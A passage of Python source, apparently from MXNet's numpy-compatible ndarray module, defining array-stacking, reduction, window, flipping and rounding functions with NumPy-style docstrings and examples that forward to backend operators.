    >>> a = np.array([[1], [2], [3]])
    >>> b = np.array([[2], [3], [4]])
    >>> np.row_stack((a, b))
    array([[1.],
           [2.],
           [3.],
           [2.],
           [3.],
           [4.]])
    """
    # Reject indexable-but-not-iterable inputs before expanding them.
    if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
        raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
    return _npi.vstack(*list(arrays))
@set_module('mxnet.ndarray.numpy')
def column_stack(tup):
    """
    Stack 1-D arrays as columns into a 2-D array.

    Each 1-D array in `tup` becomes a column of the result; 2-D arrays
    are stacked as-is, just like with `hstack`.

    Parameters
    ----------
    tup : sequence of ndarrays
        Arrays to stack; 1-D arrays are turned into 2-D columns first.

    Returns
    -------
    stacked : 2-D array
        The array formed by stacking the given arrays.

    See Also
    --------
    stack, hstack, vstack, concatenate

    Examples
    --------
    >>> a = np.array((1,2,3))
    >>> b = np.array((2,3,4))
    >>> np.column_stack((a,b))
    array([[1., 2.],
           [2., 3.],
           [3., 4.]])
    """
    # The backend op takes the inputs as positional arguments.
    return _npi.column_stack(*tup)
@set_module('mxnet.ndarray.numpy')
def hstack(arrays):
    """
    Stack arrays in sequence horizontally (column wise).

    Equivalent to concatenation along the second axis, except for 1-D
    arrays, which concatenate along the first axis.  Rebuilds arrays
    divided by `hsplit`.  See `concatenate` and `stack` for more general
    operations.

    Parameters
    ----------
    arrays : sequence of ndarrays
        Must share the same shape along all but the second axis; 1-D
        arrays may have any length.

    Returns
    -------
    stacked : ndarray
        The array formed by stacking the given arrays.

    Examples
    --------
    >>> from mxnet import np,npx
    >>> a = np.array((1,2,3))
    >>> b = np.array((2,3,4))
    >>> np.hstack((a,b))
    array([1., 2., 3., 2., 3., 4.])
    >>> a = np.array([[1],[2],[3]])
    >>> b = np.array([[2],[3],[4]])
    >>> np.hstack((a,b))
    array([[1., 2.],
           [2., 3.],
           [3., 4.]])
    """
    # The backend op takes the inputs as positional arguments.
    return _npi.hstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def dstack(arrays):
    """
    Stack arrays in sequence depth wise (along third axis).

    Equivalent to concatenation along the third axis after reshaping
    2-D arrays of shape ``(M, N)`` to ``(M, N, 1)`` and 1-D arrays of
    shape ``(N,)`` to ``(1, N, 1)``.  Rebuilds arrays divided by
    `dsplit`.  See `concatenate` and `stack` for more general
    operations.

    Parameters
    ----------
    arrays : sequence of arrays
        Must share the same shape along all but the third axis; 1-D or
        2-D arrays must have the same shape.

    Returns
    -------
    stacked : ndarray
        The stacked result, at least 3-D.

    Examples
    --------
    >>> a = np.array((1,2,3))
    >>> b = np.array((2,3,4))
    >>> np.dstack((a,b))
    array([[[1, 2],
            [2, 3],
            [3, 4]]])
    >>> a = np.array([[1],[2],[3]])
    >>> b = np.array([[2],[3],[4]])
    >>> np.dstack((a,b))
    array([[[1, 2]],
           [[2, 3]],
           [[3, 4]]])
    """
    # The backend op takes the inputs as positional arguments.
    return _npi.dstack(*arrays)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def maximum(x1, x2, out=None, **kwargs):
    """
    Return the element-wise maximum of the inputs, with broadcasting.

    Parameters
    ----------
    x1, x2 : scalar or mxnet.numpy.ndarray
        Operands to compare; their shapes must be identical or
        broadcastable to a common shape.

    Returns
    -------
    out : mxnet.numpy.ndarray or scalar
        Element-wise maximum of `x1` and `x2`; a scalar when both
        operands are scalars.
    """
    # maximum is commutative, so no reflected-scalar op is required
    # (the fourth backend slot is left as None).
    return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum,
                         _npi.maximum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def minimum(x1, x2, out=None, **kwargs):
    """
    Return the element-wise minimum of the inputs, with broadcasting.

    Parameters
    ----------
    x1, x2 : scalar or mxnet.numpy.ndarray
        Operands to compare; their shapes must be identical or
        broadcastable to a common shape.

    Returns
    -------
    out : mxnet.numpy.ndarray or scalar
        Element-wise minimum of `x1` and `x2`; a scalar when both
        operands are scalars.
    """
    # minimum is commutative, so no reflected-scalar op is required
    # (the fourth backend slot is left as None).
    return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum,
                         _npi.minimum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def swapaxes(a, axis1, axis2):
    """Interchange two axes of an array.

    Parameters
    ----------
    a : ndarray
        Input array.
    axis1 : int
        First axis.
    axis2 : int
        Second axis.

    Returns
    -------
    a_swapped : ndarray
        Array with `axis1` and `axis2` interchanged; always a copy of
        the input array.
    """
    # The backend op names its axis parameters dim1/dim2.
    return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.ndarray.numpy')
def clip(a, a_min, a_max, out=None):
    """clip(a, a_min, a_max, out=None)

    Clip (limit) the values in an array.

    Values outside the interval ``[a_min, a_max]`` are clamped to its
    edges: with an interval of ``[0, 1]``, values below 0 become 0 and
    values above 1 become 1.

    Parameters
    ----------
    a : ndarray
        Array containing elements to clip.
    a_min : scalar or `None`
        Lower bound; `None` disables clipping on the lower edge.  At
        most one of `a_min` and `a_max` may be `None`.
    a_max : scalar or `None`
        Upper bound; `None` disables clipping on the upper edge.
    out : ndarray, optional
        Destination array (may be `a` itself for in-place clipping);
        must have the right shape, and its type is preserved.

    Returns
    -------
    clipped_array : ndarray
        Copy of `a` with values below `a_min` replaced by `a_min` and
        values above `a_max` replaced by `a_max`.

    Notes
    -----
    ndarray `a_min` and `a_max` are not supported.

    Examples
    --------
    >>> a = np.arange(10)
    >>> np.clip(a, 1, 8)
    array([1., 1., 2., 3., 4., 5., 6., 7., 8., 8.], dtype=float32)
    >>> np.clip(a, 3, 6, out=a)
    array([3., 3., 3., 3., 4., 5., 6., 6., 6., 6.], dtype=float32)
    """
    if a_min is None and a_max is None:
        raise ValueError('array_clip: must set either max or min')
    # The backend kernel takes concrete scalars, so open-ended bounds
    # are encoded as infinities.
    lo = float('-inf') if a_min is None else a_min
    hi = float('inf') if a_max is None else a_max
    return _npi.clip(a, lo, hi, out=out)
@set_module('mxnet.ndarray.numpy')
def argmax(a, axis=None, out=None):
    r"""
    Return the indices of the maximum values along an axis.

    Parameters
    ----------
    a : ndarray
        Input array; only dtypes `float16`, `float32`, and `float64`
        are supported.
    axis : int, optional
        Axis to reduce over; by default the index refers to the
        flattened array.
    out : ndarray or None, optional
        Destination for the result.  Must match the expected output's
        shape and dtype exactly; if omitted, a new array is allocated.

    Returns
    -------
    index_array : ndarray of indices whose dtype is same as the input ndarray.
        Indices into `a`, shaped like `a` with the `axis` dimension
        removed.

    Notes
    -----
    When the maximum occurs multiple times, the index of the first
    occurrence is returned.

    This function differs from the original `numpy.argmax
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in
    the following aspects:

    - Input type does not support Python native iterables(list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting or auto type cast;
      its shape and dtype must equal the expected output's.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> a = np.arange(6).reshape(2,3) + 10
    >>> np.argmax(a)
    array(5.)
    >>> np.argmax(a, axis=0)
    array([1., 1., 1.])
    >>> np.argmax(a, axis=1)
    array([2., 2.])
    """
    # keepdims is fixed False to match numpy's argmax contract.
    return _npi.argmax(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def argmin(a, axis=None, out=None):
    r"""
    Returns the indices of the minimum values along an axis.

    Parameters
    ----------
    a : ndarray
        Input array. Only support ndarrays of dtype `float16`, `float32`, and `float64`.
    axis : int, optional
        By default, the index is into the flattened array, otherwise
        along the specified axis.
    out : ndarray or None, optional
        If provided, the result will be inserted into this array. It should
        be of the appropriate shape and dtype.

    Returns
    -------
    index_array : ndarray of indices whose dtype is same as the input ndarray.
        Array of indices into the array. It has the same shape as `a.shape`
        with the dimension along `axis` removed.

    Notes
    -----
    In case of multiple occurrences of the minimum values, the indices
    corresponding to the first occurrence are returned.

    This function differs from the original `numpy.argmin
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmin.html>`_ in
    the following aspects:

    - Input type does not support Python native iterables(list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> a = np.arange(6).reshape(2,3) + 10
    >>> a
    array([[10., 11., 12.],
           [13., 14., 15.]])
    >>> np.argmin(a)
    array(0.)
    >>> np.argmin(a, axis=0)
    array([0., 0., 0.])
    >>> np.argmin(a, axis=1)
    array([0., 0.])
    >>> b = np.arange(6)
    >>> b[2] = 0
    >>> b
    array([0., 1., 0., 3., 4., 5.])
    >>> np.argmin(b)  # Only the first occurrence is returned.
    array(0.)

    Specify ``out`` ndarray:

    >>> a = np.arange(6).reshape(2,3) + 10
    >>> b = np.zeros((2,))
    >>> np.argmin(a, axis=1, out=b)
    array([0., 0.])
    >>> b
    array([0., 0.])
    """
    # keepdims is fixed False to match numpy's argmin contract.
    return _npi.argmin(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def average(a, axis=None, weights=None, returned=False, out=None):
    """
    Compute the weighted average along the specified axis.

    Parameters
    ----------
    a : ndarray
        Array containing data to be averaged.
    axis : None or int or tuple of ints, optional
        Axis or axes to average over; ``None`` (the default) averages
        all elements.  Negative values count from the last axis; a
        tuple averages over all listed axes.
    weights : ndarray, optional
        Weights associated with the values in `a`, of the same dtype as
        `a`.  Either 1-D with length equal to `a`'s size along `axis`,
        or the same shape as `a`.  When omitted, every element has
        weight one.  The 1-D formula is
        ``avg = sum(a * weights) / sum(weights)``, and ``sum(weights)``
        must not be 0.
    returned : bool, optional
        When True, return the tuple ``(average, sum_of_weights)``
        instead of the average alone.  Without weights,
        ``sum_of_weights`` equals the number of averaged elements.
        Default is False.
    out : ndarray, optional
        If provided, the calculation is done into this array.

    Returns
    -------
    retval, [sum_of_weights] : ndarray
        The average along `axis` (plus the weight sum when `returned`
        is True, of the same type).  Integral `a` yields a float32
        result; otherwise the result keeps `a`'s dtype.

    Raises
    ------
    MXNetError
        - When all weights along axis sum to zero.
        - When the length of 1D weights is not the same as the shape of a along axis.
        - When given 1D weights, the axis is not specified or is not int.
        - When the shape of weights and a differ, but weights are not 1D.

    See also
    --------
    mean

    Notes
    -----
    Differences from `numpy.average`:

    - float16 overflow behavior is not guaranteed to match numpy
    - complex dtypes are unsupported
    - `a` and `weights` must share a dtype
    - integral `a` produces a float32 (not float64) result

    Examples
    --------
    >>> np.average(np.arange(1, 5))
    array(2.5)
    >>> np.average(np.arange(1, 11), weights=np.arange(10, 0, -1))
    array(4.)
    >>> data = np.arange(6).reshape((3,2))
    >>> np.average(data, axis=1, weights=np.array([0.25, 0.75]))
    array([0.75, 2.75, 4.75])
    """
    # The backend distinguishes the unweighted case via the `weighted`
    # flag rather than by a None weights argument.
    if weights is not None:
        return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out)
    return _npi.average(a, axis=axis, weights=None, returned=returned, weighted=False, out=out)
@set_module('mxnet.ndarray.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False):  # pylint: disable=arguments-differ
    """
    mean(a, axis=None, dtype=None, out=None, keepdims=None)

    Compute the arithmetic mean along the specified axis.

    Parameters
    ----------
    a : ndarray
        ndarray containing numbers whose mean is desired.
    axis : None or int or tuple of ints, optional
        Axis or axes to reduce over; the default computes the mean of
        the flattened array.  A tuple reduces over several axes at once.
    dtype : data-type, optional
        Accumulation/result type.  Integer inputs default to float32;
        floating inputs keep their own dtype.
    out : ndarray, optional
        Destination array; must match the expected output's shape and
        type.  Default is None.
    keepdims : bool, optional
        When True, reduced axes remain in the result as size-one
        dimensions, so the result broadcasts against the input.

    Returns
    -------
    m : ndarray, see dtype parameter above
        A new array of mean values, or a reference to `out` when it was
        supplied.

    Notes
    -----
    Differences from `numpy.mean
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_:

    - only ndarray is accepted as valid input; python iterables or
      scalars are not supported
    - default data type for integer input is float32

    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> np.mean(a)
    array(2.5)
    >>> np.mean(a, dtype=np.float64)
    array(2.5, dtype=float64)
    """
    # Thin dispatch; all reduction logic lives in the backend kernel.
    return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the standard deviation along the specified axis.

    Returns the standard deviation — a measure of the spread of a
    distribution — of the array elements, computed over the flattened
    array by default or over `axis` when given.

    Parameters
    ----------
    a : ndarray
        Calculate the standard deviation of these values.
    axis : None or int or tuple of ints, optional
        Axis or axes to reduce over; the default uses the flattened
        array.  A tuple reduces over several axes at once.
    dtype : dtype, optional
        Computation type.  Integer arrays default to float64; float
        arrays keep their own type.
    out : ndarray, optional
        Destination array; must match the expected output's shape, and
        computed values are cast to its type if necessary.
    ddof : int, optional
        Delta Degrees of Freedom: the divisor is ``N - ddof`` where
        ``N`` is the number of elements.  Defaults to zero.
    keepdims : bool, optional
        When True, reduced axes remain in the result as size-one
        dimensions, so the result broadcasts against the input.

    Returns
    -------
    standard_deviation : ndarray, see dtype parameter above.
        A new array with the standard deviation, or a reference to
        `out` when it was supplied.

    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> np.std(a)
    1.1180339887498949 # may vary
    >>> np.std(a, axis=0)
    array([1., 1.])
    >>> np.std(a, axis=1)
    array([0.5, 0.5])
    """
    # Thin dispatch; all reduction logic lives in the backend kernel.
    return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the variance along the specified axis.

    Returns the variance — a measure of the spread of a distribution —
    of the array elements, computed over the flattened array by default
    or over `axis` when given.

    Parameters
    ----------
    a : ndarray
        Array containing numbers whose variance is desired. If `a` is not an
        array, a conversion is attempted.
    axis : None or int or tuple of ints, optional
        Axis or axes to reduce over; the default uses the flattened
        array.  A tuple reduces over several axes at once.
    dtype : data-type, optional
        Computation type.  Integer arrays default to `float32`; float
        arrays keep their own type.
    out : ndarray, optional
        Destination array; must match the expected output's shape, and
        the type is cast if necessary.
    ddof : int, optional
        "Delta Degrees of Freedom": the divisor is ``N - ddof`` where
        ``N`` is the number of elements.  Defaults to zero.
    keepdims : bool, optional
        When True, reduced axes remain in the result as size-one
        dimensions, so the result broadcasts against the input.

    Returns
    -------
    variance : ndarray, see dtype parameter above
        A new array with the variance, or a reference to `out` when it
        was supplied.

    Examples
    --------
    >>> a = np.array([[1, 2], [3, 4]])
    >>> np.var(a)
    array(1.25)
    >>> np.var(a, axis=0)
    array([1., 1.])
    >>> np.var(a, axis=1)
    array([0.25, 0.25])
    """
    # Thin dispatch; all reduction logic lives in the backend kernel.
    return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
    """Return an array representing the indices of a grid.

    Compute an array where the subarrays contain index values 0,1,...
    varying only along the corresponding axis.

    Parameters
    ----------
    dimensions : sequence of ints
        The shape of the grid.
    dtype : data-type, optional
        The desired data-type for the array. Default is `int32`.
    ctx : device context, optional
        Device context on which the memory is allocated. Default is
        `mxnet.context.current_context()`.

    Returns
    -------
    grid : ndarray
        The array of grid indices,
        ``grid.shape = (len(dimensions),) + tuple(dimensions)``.

    Notes
    -----
    The output shape is obtained by prepending the number of dimensions
    in front of the tuple of dimensions, i.e. if `dimensions` is a tuple
    ``(r0, ..., rN-1)`` of length ``N``, the output shape is
    ``(N,r0,...,rN-1)``.

    The subarrays ``grid[k]`` contains the N-D array of indices along the
    ``k-th`` axis. Explicitly::

        grid[k,i0,i1,...,iN-1] = ik

    Examples
    --------
    >>> grid = np.indices((2, 3))
    >>> grid.shape
    (2, 2, 3)
    >>> grid[0]  # row indices
    array([[0, 0, 0],
           [1, 1, 1]], dtype=int32)
    >>> grid[1]  # column indices
    array([[0, 1, 2],
           [0, 1, 2]], dtype=int32)

    The indices can be used as an index into an array.

    >>> x = np.arange(20).reshape(5, 4)
    >>> row, col = np.indices((2, 3))
    >>> x[row, col]
    array([[0., 1., 2.],
           [4., 5., 6.]])

    Note that it would be more straightforward in the above example to
    extract the required elements directly with ``x[:2, :3]``.
    """
    if isinstance(dimensions, (tuple, list)):
        if ctx is None:
            ctx = current_context()
        return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
    else:
        raise ValueError("The dimensions must be sequence of ints")
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def copysign(x1, x2, out=None, **kwargs):
    r"""
    Change the sign of x1 to that of x2, element-wise.

    A scalar `x2` has its sign copied onto every element of `x1`.

    Parameters
    ----------
    x1 : ndarray or scalar
        Values to change the sign of.
    x2 : ndarray or scalar
        The sign of `x2` is copied to `x1`.
    out : ndarray or None, optional
        Destination of the right shape and type; a new array is
        allocated when omitted.

    Returns
    -------
    out : ndarray or scalar
        The values of `x1` carrying the sign of `x2`; a scalar when
        both inputs are scalars.

    Notes
    -----
    Unlike the original `numpy.copysign
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_,
    the ``where`` param is not supported.

    Examples
    --------
    >>> np.copysign(1.3, -1)
    -1.3
    >>> a = np.array([-1, 0, 1])
    >>> np.copysign(a, -1.1)
    array([-1., -0., -1.])
    >>> np.copysign(a, np.arange(3)-1)
    array([-1.,  0.,  1.])
    """
    # copysign is not commutative, so a reflected scalar op is supplied
    # for the scalar-op-array case.
    return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign,
                         _npi.copysign_scalar, _npi.rcopysign_scalar, out)
@set_module('mxnet.ndarray.numpy')
def ravel(x, order='C'):
    r"""
    ravel(x)

    Return a contiguous flattened array.

    A 1-D array containing the elements of the input, read in
    row-major (C-style) order; a copy is made only when needed.

    Parameters
    ----------
    x : ndarray
        Input array.
    order : `C`, optional
        Only row-major, C-style order is supported.

    Returns
    -------
    y : ndarray
        An array of the same subtype as `x` with shape ``(x.size,)``.

    Notes
    -----
    Unlike the original numpy function, only row-major (C-style) order
    is supported.

    Examples
    --------
    It is equivalent to ``reshape(x, -1)``.

    >>> x = np.array([[1, 2, 3], [4, 5, 6]])
    >>> print(np.ravel(x))
    [1. 2. 3. 4. 5. 6.]
    >>> print(np.ravel(x.T))
    [1. 4. 2. 5. 3. 6.]
    """
    if order != 'C':
        raise NotImplementedError('order {} is not supported'.format(order))
    # Python scalars go through numpy; device arrays through the backend.
    if isinstance(x, numeric_types):
        return _np.reshape(x, -1)
    if isinstance(x, NDArray):
        return _npi.reshape(x, -1)
    raise TypeError('type {} not supported'.format(str(type(x))))
def unravel_index(indices, shape, order='C'):  # pylint: disable=redefined-outer-name
    """
    Convert a flat index or array of flat indices into a tuple of
    coordinate arrays.

    Parameters
    ----------
    indices : array_like
        Integer array whose elements index into the flattened version
        of an array with the given `shape`.
    shape : tuple of ints
        The shape of the array to use for unraveling `indices`.

    Returns
    -------
    unraveled_coords : tuple of ndarray
        One coordinate array per dimension of `shape`, each shaped like
        the `indices` input.

    Examples
    --------
    >>> np.unravel_index([22, 41, 37], (7,6))
    ([3. 6. 6.]
     [4. 5. 1.])
    >>> np.unravel_index(1621, (6,7,8,9))
    (3, 1, 4, 1)
    """
    if order != 'C':
        raise NotImplementedError('Do not support column-major (Fortran-style) order at this moment')
    # Python scalars go through numpy; device arrays through the backend.
    if isinstance(indices, numeric_types):
        return _np.unravel_index(indices, shape)
    ret = _npi.unravel_index_fallback(indices, shape=shape)
    return tuple(item for item in ret)
def diag_indices_from(arr):
    """
    Return a tuple of indices addressing the main diagonal of *arr*.

    For an array with ``arr.ndim >= 2`` dimensions and shape
    ``(n, n, ..., n)`` this gives the indices of ``arr[i, i, ..., i]``
    for ``i = 0 .. n-1`` — the usual diagonal when ``arr.ndim == 2``.

    Parameters
    ----------
    arr : ndarray
        Array whose main diagonal is addressed. All dimensions should
        have equal length.

    Returns
    -------
    diag : tuple of ndarray
        Indices of the main diagonal.

    Examples
    --------
    >>> a = np.arange(16).reshape(4, 4)
    >>> idx = np.diag_indices_from(a)
    >>> idx
    (array([0, 1, 2, 3]), array([0, 1, 2, 3]))
    >>> a[idx] = 100
    >>> a
    array([[100,   1,   2,   3],
           [  4, 100,   6,   7],
           [  8,   9, 100,  11],
           [ 12,  13,  14, 100]])
    """
    index_arrays = _npi.diag_indices_from(arr)
    return tuple(index_arrays)
@set_module('mxnet.ndarray.numpy')
def hanning(M, dtype=_np.float32, ctx=None):
    r"""Return the Hanning window.

    The Hanning window is a taper formed by using a weighted cosine:

    .. math:: w(n) = 0.5 - 0.5\cos\left(\frac{2\pi{n}}{M-1}\right)
              \qquad 0 \leq n \leq M-1

    It is named after Julius von Hann and is also known as the Cosine
    Bell (or Hann window, to avoid confusion with the similar Hamming
    window). It is commonly used as a smoothing/apodization function
    in signal processing.

    Parameters
    ----------
    M : int
        Number of points in the output window. If zero or less, an
        empty array is returned.
    dtype : str or numpy.dtype, optional
        Value type of the window; select ``numpy.float32`` (default)
        or ``numpy.float64``.
    ctx : Context, optional
        Device context (default is the current default context).

    Returns
    -------
    out : ndarray, shape(M,)
        The window, with the maximum value normalized to one (the
        value one appears only if `M` is odd).

    See Also
    --------
    blackman, hamming

    References
    ----------
    .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power
           spectra, Dover Publications, New York.
    .. [2] Wikipedia, "Window function",
           http://en.wikipedia.org/wiki/Window_function

    Examples
    --------
    >>> np.hanning(12)
    array([0.        , 0.07937324, 0.29229254, 0.5711574 , 0.8274304 ,
           0.9797465 , 0.97974646, 0.82743025, 0.5711573 , 0.29229245,
           0.07937312, 0.        ])
    """
    device = ctx if ctx is not None else current_context()
    return _npi.hanning(M, dtype=dtype, ctx=device)
@set_module('mxnet.ndarray.numpy')
def hamming(M, dtype=_np.float32, ctx=None):
    r"""Return the hamming window.

    The Hamming window is a taper formed by using a weighted cosine:

    .. math:: w(n) = 0.54 - 0.46\cos\left(\frac{2\pi{n}}{M-1}\right)
              \qquad 0 \leq n \leq M-1

    It was named for R. W. Hamming and is commonly used as a
    smoothing/apodization function in signal processing.

    Parameters
    ----------
    M : int
        Number of points in the output window. If zero or less, an
        empty array is returned.
    dtype : str or numpy.dtype, optional
        Value type of the window; select ``numpy.float32`` (default)
        or ``numpy.float64``.
    ctx : Context, optional
        Device context (default is the current default context).

    Returns
    -------
    out : ndarray, shape(M,)
        The window, with the maximum value normalized to one (the
        value one appears only if `M` is odd).

    See Also
    --------
    blackman, hanning

    References
    ----------
    .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power
           spectra, Dover Publications, New York.
    .. [2] Wikipedia, "Window function",
           https://en.wikipedia.org/wiki/Window_function

    Examples
    --------
    >>> np.hamming(12)
    array([0.08000001, 0.15302339, 0.34890914, 0.6054648 , 0.841236  ,
           0.9813669 , 0.9813668 , 0.8412359 , 0.6054647 , 0.34890908,
           0.15302327, 0.08000001])
    """
    device = ctx if ctx is not None else current_context()
    return _npi.hamming(M, dtype=dtype, ctx=device)
@set_module('mxnet.ndarray.numpy')
def blackman(M, dtype=_np.float32, ctx=None):
    r"""Return the Blackman window.

    The Blackman window is a taper formed by using the first three
    terms of a summation of cosines:

    .. math:: w(n) = 0.42 - 0.5 \cos(2\pi n/{M-1}) + 0.08 \cos(4\pi n/{M-1})

    It was designed to have close to the minimal leakage possible —
    a "near optimal" tapering function, almost as good (by some
    measures) as the Kaiser window.

    Parameters
    ----------
    M : int
        Number of points in the output window. If zero or less, an
        empty array is returned.
    dtype : str or numpy.dtype, optional
        Value type of the window; select ``numpy.float32`` (default)
        or ``numpy.float64``.
    ctx : Context, optional
        Device context (default is the current default context).

    Returns
    -------
    out : ndarray
        The window, with the maximum value normalized to one (the
        value one appears only if the number of samples is odd).

    See Also
    --------
    hamming, hanning

    References
    ----------
    Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra,
    Dover Publications, New York.

    Examples
    --------
    >>> np.blackman(12)
    array([-1.4901161e-08,  3.2606423e-02,  1.5990365e-01,  4.1439798e-01,
            7.3604530e-01,  9.6704686e-01,  9.6704674e-01,  7.3604506e-01,
            4.1439781e-01,  1.5990359e-01,  3.2606363e-02, -1.4901161e-08])
    """
    device = ctx if ctx is not None else current_context()
    return _npi.blackman(M, dtype=dtype, ctx=device)
@set_module('mxnet.ndarray.numpy')
def flip(m, axis=None, out=None):
    r"""
    Reverse the order of elements in an array along the given axis.

    The shape of the array is preserved, but the elements are reordered.

    Parameters
    ----------
    m : ndarray or scalar
        Input array.
    axis : None or int or tuple of ints, optional
        Axis or axes along which to flip over. The default,
        ``axis=None``, flips over all of the axes of the input array.
        A negative axis counts from the last to the first axis; a
        tuple of ints flips every axis in the tuple.
    out : ndarray or scalar, optional
        Alternative output array in which to place the result. It must
        have the same shape and type as the expected output.

    Returns
    -------
    out : ndarray or scalar
        A view of `m` with the entries of `axis` reversed. Since a
        view is returned, this operation is done in constant time.

    Examples
    --------
    >>> A = np.arange(8).reshape((2,2,2))
    >>> np.flip(A, 0)
    array([[[4, 5],
            [6, 7]],
           [[0, 1],
            [2, 3]]])
    >>> np.flip(A)
    array([[[7, 6],
            [5, 4]],
           [[3, 2],
            [1, 0]]])
    >>> np.flip(A, (0, 2))
    array([[[5, 4],
            [7, 6]],
           [[1, 0],
            [3, 2]]])
    """
    from ...numpy import ndarray
    # ndarray and plain-scalar inputs are mutually exclusive, so the
    # dispatch order below matches the original behavior exactly.
    if isinstance(m, ndarray):
        return _npi.flip(m, axis, out=out)
    if isinstance(m, numeric_types):
        return _np.flip(m, axis)
    raise TypeError('type {} not supported'.format(str(type(m))))
@set_module('mxnet.ndarray.numpy')
def flipud(m):
    r"""
    Flip array in the up/down direction.

    Flip the entries in each column in the up/down direction. Rows are
    preserved, but appear in a different order than before. Equivalent
    to ``m[::-1,...]``; does not require the array to be
    two-dimensional.

    Parameters
    ----------
    m : array_like
        Input array.

    Returns
    -------
    out : array_like
        A view of `m` with the rows reversed. Since a view is
        returned, this operation is :math:`\mathcal O(1)`.

    See Also
    --------
    fliplr : Flip array in the left/right direction.
    rot90 : Rotate array counterclockwise.

    Examples
    --------
    >>> A = np.diag(np.array([1.0, 2, 3]))
    >>> np.flipud(A)
    array([[0., 0., 3.],
           [0., 2., 0.],
           [1., 0., 0.]])
    >>> np.flipud(np.array([1,2]))
    array([2., 1.])
    """
    return flip(m, axis=0)
@set_module('mxnet.ndarray.numpy')
def fliplr(m):
    r"""
    Flip array in the left/right direction.

    Flip the entries in each row in the left/right direction. Columns
    are preserved, but appear in a different order than before.
    Equivalent to ``m[:,::-1]``; requires the array to be at least
    2-D.

    Parameters
    ----------
    m : array_like
        Input array, must be at least 2-D.

    Returns
    -------
    f : ndarray
        A view of `m` with the columns reversed. Since a view is
        returned, this operation is :math:`\mathcal O(1)`.

    See Also
    --------
    flipud : Flip array in the up/down direction.
    rot90 : Rotate array counterclockwise.

    Examples
    --------
    >>> A = np.diag(np.array([1.,2.,3.]))
    >>> np.fliplr(A)
    array([[0., 0., 1.],
           [0., 2., 0.],
           [3., 0., 0.]])
    """
    return flip(m, axis=1)
@set_module('mxnet.ndarray.numpy')
def around(x, decimals=0, out=None, **kwargs):
    r"""
    around(x, decimals=0, out=None)
    Evenly round to the given number of decimals.
    Parameters
    ----------
    x : ndarray or scalar
        Input data.
    decimals : int, optional
        Number of decimal places to round to (default: 0). If
        decimals is negative, it specifies the number of positions to
        the left of the decimal point.
    out : ndarray, optional
        Alternative output array in which to place the result. It must have
        the same shape and type as the expected output.
    Returns
    -------
    rounded_array : ndarray or scalar
        An array of the same type as `x`, containing the rounded values.
        A reference to the result is returned.
    Notes
    -----
    For values exactly halfway between rounded decimal values, NumPy
    rounds to the nearest even value. Thus 1.5 and 2.5 round to 2.0,
    -0.5 and 0.5 round to 0.0, etc.
    This function differs from the original numpy.around in the following aspects:
    - Cannot cast type automatically. Dtype of `out` must be same as the expected one.
    - Cannot support complex-valued number.
    Examples
    --------
    >>> np.around([0.37, 1.64])
    array([ 0., 2.])
    >>> np.around([0.37, 1.64], decimals=1)
    array([ 0.4, 1.6])
    >>> np.around([.5, 1.5, 2.5, 3.5, 4.5]) # rounds to nearest even value
    array([ 0., 2., 2., 4., 4.])
    >>> np.around([1, 2, 3, 11], decimals=1) # ndarray of ints is returned
    array([ 1, 2, 3, 11])
    >>> np.around([1, 2, 3, 11], decimals=-1)
    array([ 0, 0, 0, 10])
    """
    from ...numpy import ndarray
    # Scalars go to official NumPy; ndarrays go to the MXNet backend op.
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
    elif isinstance(x, ndarray):
        return _npi.around(x, decimals, out=out, **kwargs)
    else:
        raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
def round(x, decimals=0, out=None, **kwargs):
    r"""
    round_(a, decimals=0, out=None)
    Round an array to the given number of decimals.

    See Also
    --------
    around : equivalent function; see for details.
    """
    from ...numpy import ndarray
    # ndarray and plain-scalar inputs are mutually exclusive, so this
    # dispatch order is equivalent to checking scalars first.
    if isinstance(x, ndarray):
        return _npi.around(x, decimals, out=out, **kwargs)
    if isinstance(x, numeric_types):
        return _np.around(x, decimals, **kwargs)
